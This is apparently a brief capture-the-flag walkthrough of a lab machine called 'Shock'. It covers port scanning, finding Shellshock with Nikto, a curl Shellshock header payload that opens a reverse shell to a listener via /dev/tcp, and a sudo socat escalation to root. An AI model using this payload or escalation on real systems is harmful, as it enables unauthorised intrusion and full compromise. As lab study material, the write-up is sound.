Shock

nmap

mkdir nmap
sudo rustscan -a 172.31.1.3 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

A web service is open on port 80

And we can confirm that port 80 is really a web server.

Let's run Nikto, and after some time running, looks like the server is vulnerable to ShellShock vulnerability.

Since the shellshock vulnerability is pretty popular, we can find how to exploit and get a reverse shell from hacktricks

sudo nc -lvnp 80
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.0.41/80 0>&1' http://172.31.1.3/cgi-bin/test.cgi

Craft the shell to your needs and you should receive your shell.

Running sudo -l we can confirm that we can run socat with root privilege without a password.

To gain root privilege, run the following

sudo socat stdin exec:/bin/sh

Last updated 4 years ago